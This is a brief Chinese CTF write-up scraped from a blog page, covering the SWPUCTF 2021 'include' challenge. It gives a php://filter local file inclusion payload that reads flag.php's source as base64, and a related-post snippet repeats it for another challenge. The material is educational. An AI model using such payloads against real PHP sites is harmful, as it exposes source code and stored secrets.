[SWPUCTF 2021 新生赛]include

于 2024-08-08 10:50:34 发布
阅读量116 收藏
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81462177/article/details/141020612
版权

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

桑榆百川
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021年程序设计竞选拔实训.doc
12-18
2021年程序设计竞选拔实训 本文档将详细介绍 2021 年程序设计竞选拔实训的相关知识点,并提供详细的解释和示例代码。 排列数问题 问题描述:由 1 个“1”,2 个“2”,k 个“3”能构成多少个不同排列?...
S2 AWD排位-12.zip
12-07
【S2 AWD排位-12.zip】是一个与网络安全相关的压缩文件,源自BugKu平台的2021年CTF(Capture The Flag)AWD(Attack-Defend,攻防)排位。CTF比网络安全领域中一种常见的技能竞技活动,参者需要展示他们在...
BugKu 2021 S1 AWD排位-7.zip
12-07
【BugKu 2021 S1 AWD排位-7.zip】是一个与网络安全相关的挑战,源自2021年BugKu CTF(Capture The Flag)比的 Automated Web Defense (AWD) 排位阶段。CTF是一种网络安全,参者通过解决各种安全问题来...
2021天梯题解1
08-03
2021天梯题解1】是2021年4月30日举办的一场编程竞的题目解析,由赵长乐和王小川进行了解析。本文将详细探讨其中涉及的几个编程知识点。 ### L1-3 强迫症 此题目的关键是将一个六位数的年份格式化为"YYYY-MM...
include 编译器
12-09
`include`编译器指令是编程语言中一个非常基础且重要的功能,它的主要作用是在编译源代码时将其他外部文件的内容插入到当前文件中。这个功能在多种编程语言中都有应用,包括C、C++、Java、Verilog等。在不同的语言中...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
财务费用支出表-可查询.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ssm_160_mysql_强国有我党建网站_.zip
08-09
强国有我党建网站采用JAVA语言来进行开发,因为JAVA语言作为主流的web开发语言,其技术成熟,较为对各类开发者友好,社区也有十分多的文档,同时搭配SSM框架进行使用,可以做到更加高的开发效率帮助完成本次的开发和设计,在本次的开发选用的数据库为MySQL数据库,MySQL数据库可以很好的连接和搭配本次使用的JAVA语言,同时数据库也是一个开源免费完全不需要花钱的良心数据库,使用免费版本已经足已完成本次要实现的开发和设计的功能,最后本次的开发使用工具为eclipse,本工具在实际的开发使用中也是程序员进行java开发的不二选择,虽然目前后继者也有,但这个是完全开源免费的因为很适合本次开发工作,综上所述本次的开发与设计工作室用了目前语言排行榜第一的JAVA以及流行的web框架SSM,同时使用了MySQL数据库实现数据的储存,最后确定了eclipse作为我们的IDE环境。
PHP赞支付最新易支付系统源码 全新界面
08-09
安装说明: 访问 域名/install 进行安装 后台地址:/admin 账号admin 密码123456 后台可以对接码支付平台 这个源码余额需要监控,大家可以使用360网站监控来监控。 监控地址:域名/cron.php 域名/cron.php?do=settle
财务报表-自动管理收支表.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ATM基础管理系统java窗口界面完整版.docx
08-09
ATM基础管理系统java窗口界面完整版
ssm_138_mysql_学生选课管理系统_.zip
08-09
现在的学校,无论是高等院校还是中学、小学,伴随着我国教育的不断普及,学校的学生人数也在不断的增长。在这种学生人数增长的带动下,现在学校所面临的教学管理压力较大。而学生在日常的学习活动中,选课是一项经常需要被使用的功能,因此学校在选课管理上需要高度的重视,特别是在每个学期的开学,学生都会进行新学期的选修课程选择,而传统的人工记录和管理的方式面对当下日益增长的学生人数而言,是无法很好的提供有效的管理的。而随着计算机和互联网的快速发展,现在通过以网络结构程序来实现在线选课是十分有必要进行开发和设计运行的,本次是通过利用了SSM框架来来实现一个学生选课系统的完整搭建,通过该系统的搭建来实现学生在线选课、教师在线课程管理、管理员进行全方位后台信息管理的主要功能实现。 本次所设计的系统能够有效的在各大高等院校进行使用,为学生、教师提供有效的在线服务。整体的设计上逻辑清晰,内容完整,具有很强的实用意义。
JAVA打飞机游戏设计与实现(论文+源代码).rar
08-09
在信息社会中,手机及其他无线设备越来越多的走进普通百姓的工作和生活,随着信息网络化的不断进展,手机及其他无线设备上网络势在必行。但是传统手机存在以下弊端: 1. 传统手机出厂时均由硬件厂商固化程序,程序不能增加、删除,有了错误也不能更新、修改,若要增加新功能必须另换一部手机。 2. 传统手机访问互联网是通过WAP(Wireless Application Protocal),所有网络资源必须接通网络才能在线访问,非常耗时、费用亦很高。 而Java技术在无线应用方面的优势非常明显: 1. 应用程序可按需下载,而不是购买由硬件商提供的套件,可升级空间大。 2. Java技术提供了一个类库,它使的应用开发商可以创建更为直觉、丰富的用户界面(GUI); 3. Java技术使网络带宽的应用更为有效,因为应用程序可以下载到器件上,并在本地运行,仅仅是在连接到服务器时才会占用网络带宽。 基于以上分析,Java手机将是未来手机的发展方向,是业界的热点。
基于MATLAB的汽车框定(完美运行).zip
08-09
汽车识别定位是指利用计算机视觉技术对道路上的汽车进行识别和定位的过程。通过分析汽车的外观特征(如车辆型号、颜色、特殊标志等)和运动轨迹,可以实现对汽车的自动识别和定位。 汽车识别定位在交通管理、智能交通系统和自动驾驶等领域具有重要应用价值。通过实时监测道路上的汽车信息,可以实现交通流量统计、交通拥堵预警、违规行驶监测等功能。在自动驾驶领域,汽车识别定位可以用来检测和跟踪其他车辆,实现车辆间的协同行驶。 汽车识别定位涉及到计算机视觉、图像处理、模式识别、机器学习等多个领域的技术。常用的方法包括特征提取、目标检测、目标跟踪等。目前,深度学习技术在汽车识别定位中表现出良好的效果,能够实现高准确率和实时性。
财务表.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于Springboot的宠物商城网站系统(有报告) Javaee项目,springboot项目
最新发布
08-09
资源详情:https://blog.csdn.net/2302_78191516/article/details/141072356
springboot8基于Web的社区医院管理服务系统.zip
08-09
首先介绍了设计的背景与研究目的,其次介绍系统相关技术,重点叙述了系统功能分析以及详细设计,最后总结了系统的开发心得。
最新运营版视频打赏平台源码/Thinkphp内核+支付宝/QQ钱包/微信二维码收款系统V3.6+安装文字教程
08-09
【第四版打赏源码】最新运营版视频打赏平台源码/Thinkphp内核+支付宝/QQ钱包/微信二维码收款系统V3.6 这两天有人说6月发出来的第三版有点问题,这个是最原始2018款,不过放心我测试并修复了一些问题,现在放给你们! 到处都是打赏视频,能用的不多,这个琉璃试过了,正常运行,如果不能运行,大家去锤死他…. 站长简单测试 编码是gbk的 自行调整,不会的别下载~~
【创新发文无忧】Matlab实现蛇群优化算法SO-DELM的故障诊断算法研究.rar
08-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
[ACTF2020 新生]Include
09-19
[ACTF2020 新生]Include是一道Web题目,考察的是文件包含漏洞。通过打开网页,发现一个提示链接,点击进去只有一句提示语"Can you find out the flag?",说明flag很可能被隐藏在这个页面中。使用F12查看网页源代码,发现没有其他内容。根据题目名字是include,可以确定这是一个文件包含漏洞的题目,答案很可能在文件中。我们可以尝试在URL后面加上"?file=php://filter/read=convert.base64-encode/resource=flag.php",这样会输出一个base64编码的字符串。将这个字符串解码后即可获取到flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值